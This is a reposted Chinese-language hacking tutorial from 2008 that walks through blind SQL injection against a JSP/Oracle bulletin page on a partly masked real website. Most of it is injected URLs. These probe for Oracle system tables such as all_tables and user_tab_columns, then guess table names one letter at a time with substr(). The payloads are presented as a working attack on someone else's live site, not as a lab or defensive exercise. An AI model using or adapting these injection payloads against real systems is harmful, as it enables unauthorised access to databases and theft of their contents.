西安网吧在线 - JSP+Oracle SQL Injection之旅

JSP+Oracle SQL Injection之旅

作者:佚名来源:IT专家网更新时间:2008-8-13 0:24:05 【大中小】评论：0 条

　　首先需要看一下系统表是否存在，一般都是存在的，没有就没得玩了，只能回家抱孩子了。提交URL：

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from all_tables) and '1'='1

　　这里是想看一下有没有“all_tables”这个系统表，将“and”后的结果和0比较，如果后面为真，这整个语句都为真，并能正常返回页面，反之就不能正常返回了。下面的判断也是这个道理，相信大家都明白，我就不多说了。再依次提交：

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables) and '1'='1
　　http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns) AND '1'='1

　　返回如下结果，如图2所示。

　　图2

　　都正确返回，说明存在猜测的系统表。下面看我们怎么猜它的其他表名(注意：Oracle里的表名、列名都是要大写的，要注意输写，还有下面用的到Length()、Substr()等函数的说明，请查看相关资料)。

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables where substr(table_name,1,1)='P') and '1'='1
　　http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables where substr(table_name,1,2)='PL') and '1'='1

　　第二个字母为L，大家也可能用Ascii()来试试。得到一个表名，第一个字符为P，第二个字符为L。汗!一个一个的试，到后来才发现这里的步骤真是多余的……

JSP+Oracle SQL Injection之旅

Tags： JS 之旅